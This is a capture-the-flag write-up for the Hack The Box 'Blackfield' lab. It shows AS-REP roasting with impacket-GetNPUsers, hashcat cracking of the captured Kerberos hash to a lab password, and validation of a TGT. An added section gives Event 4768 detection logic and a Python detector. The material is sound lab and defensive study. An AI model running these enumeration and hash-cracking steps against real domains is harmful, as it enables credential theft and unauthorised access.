ASREPRoasting
A total of 333 valid domain users have been enumerated via the [[Blackfield_RID_Cycling|RID Cycling]] technique (see https://www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/).
Additionally, the //dc01.blackfield.local/profiles$ share contained a large number of directories that appear to be named after users. While these names have not been verified as valid domain users against the target Key Distribution Center (KDC), retaining them could be valuable for potential exploitation vectors later on.
Using the list of users from the [[Blackfield_RID_Cycling|RID Cycling]] technique, I will check whether any of those accounts have DONT_REQ_PREAUTH set.
impacket-GetNPUsers
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-GetNPUsers blackfield.local/@dc01.blackfield.local -usersfile users.txt -request -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...REDACTED...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
The support user has the DONT_REQ_PREAUTH bit set, so the KDC answered the AS-REQ with an AS-REP whose encrypted part is keyed only by the account's password-derived key (etype 23, RC4-HMAC), which can be cracked offline. This particular account was initially enumerated by kerbrute in an earlier stage.
Additionally, the KDC_ERR_C_PRINCIPAL_UNKNOWN (Client not found in Kerberos database) responses indicate that the names extracted from the //dc01.blackfield.local/profiles$ share are not domain users.
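From the defender's side, the same run leaves a distinctive trail in Windows Security Event 4768 (Kerberos authentication ticket requested) on the DC: failed requests with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) or 0x12 (KDC_ERR_CLIENT_REVOKED), and a successful request with Pre-Authentication Type 0 and ticket encryption type 0x17 (RC4-HMAC, the etype 23 material hashcat mode 18200 cracks). The detection logic below is an added example, not part of this writeup; the 4768 records and the 192.0.2.x source addresses are constructed.

```python
"""Flag AS-REP roasting and username enumeration in Windows Security Event 4768
(Kerberos TGT request) records. Added example; every event below is constructed."""
from collections import Counter

# Constructed 4768 records using the real EventData field names. Status is the
# KRB-ERROR code the KDC logged (0x0 = success); failures carry no ticket etype.
EVENTS = [
    # Disabled account (krbtgt is always disabled): KDC_ERR_CLIENT_REVOKED (0x12)
    {"TargetUserName": "krbtgt", "IpAddress": "192.0.2.10", "Status": "0x12",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # Account with DONT_REQ_PREAUTH: TGT issued with no pre-auth, RC4 etype 0x17 (23)
    {"TargetUserName": "support", "IpAddress": "192.0.2.10", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Names absent from the directory: KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6)
    {"TargetUserName": "profile1", "IpAddress": "192.0.2.10", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "profile2", "IpAddress": "192.0.2.10", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "profile3", "IpAddress": "192.0.2.10", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # Benign password logon: PA-ENC-TIMESTAMP pre-auth (type 2), AES256 ticket (0x12)
    {"TargetUserName": "support", "IpAddress": "192.0.2.20", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

def asrep_roast_hits(events):
    """(user, source, etype) for TGTs issued without pre-authentication: the
    AS-REP enc-part is then keyed only by the account's password-derived key."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events if e["Status"] == "0x0" and e["PreAuthType"] == "0"]

def enumeration_sources(events, threshold=3):
    """{source: count} for hosts with >= threshold 0x6 failures: a burst of unknown
    principals from one address is the footprint of spraying a username list."""
    unknown = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}

def report(events):
    """Summary lines, with the fix (clear UF_DONT_REQUIRE_PREAUTH) per roastable user."""
    lines = [f"AS-REP without pre-auth: {u} from {ip}, etype {et}; clear "
             f"UF_DONT_REQUIRE_PREAUTH (0x400000) on {u}"
             for u, ip, et in asrep_roast_hits(events)]
    lines += [f"Username enumeration suspected from {ip}: {n} unknown principals"
              for ip, n in enumeration_sources(events).items()]
    return lines

if __name__ == "__main__":
    print("\n".join(report(EVENTS)))
```

The benign record with PreAuthType 2 is deliberately left unflagged: the signal is a successful TGT with no pre-authentication at all, not RC4 use on its own.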
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat --show support.hash
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat -a 0 -m 18200 support.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344386
* bytes.....: 139921519
* keyspace..: 14344386
$krb5asrep$23$support@blackfield.local:66218f8855680578f98602b5455df6ba$fe10eca7fce8bcbd44db442ba0117190ca3c2792a6efbffde398aa35c02bd7d8c2a7b5eb65877f07f26aae188534c94f341d568ec54b0303d52fa27326332d6047d8b893b0d78746b19d2036955b7ee57eab75aa9b60582a9a6dd7fe8839c34f35af77da14cc13be3ae021014e0083ef8ce9a95703b87f38946b73e34daaa5a81eef393ef7f5525ab9c94e807a32ebbf4a20bcd34c5c7699e2d0e4c90f1bd34e4262925e2ea957ce588da25eeda4b7267351b052960c0da3a806ee9f49548e85d12395c7332d694f87c0f32222ce79eeb69bb93a6e25e7073d500853bca3bd2fe52d6611acec53b7488540100c44cb1ffaf2c145:#00^BlackKnight
session..........: hashcat
status...........: Cracked
hash.mode........: 18200 (Kerberos 5, etype 23, AS-REP)
hash.target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:66218f885568...f2c145
time.started.....: Thu Dec 21 00:52:19 2023 (8 secs)
time.estimated...: Thu Dec 21 00:52:27 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 1925.7 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 14337024/14344386 (99.95%)
rejected.........: 0/14337024 (0.00%)
restore.point....: 14333952/14344386 (99.93%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: #1crappers -> "$)(*(dolphins
hardware.mon.#1..: Util: 63%
started: Thu Dec 21 00:52:18 2023
stopped: Thu Dec 21 00:52:28 2023
hashcat cracked the AS-REP hash for the support user. The recovered password is #00^BlackKnight
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-getTGT BLACKFIELD.LOCAL/support@dc01.blackfield.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: #00^BlackKnight
[*] Saving ticket in support@dc01.blackfield.local.ccache
Credential validated for the support user; a TGT was saved to support@dc01.blackfield.local.ccache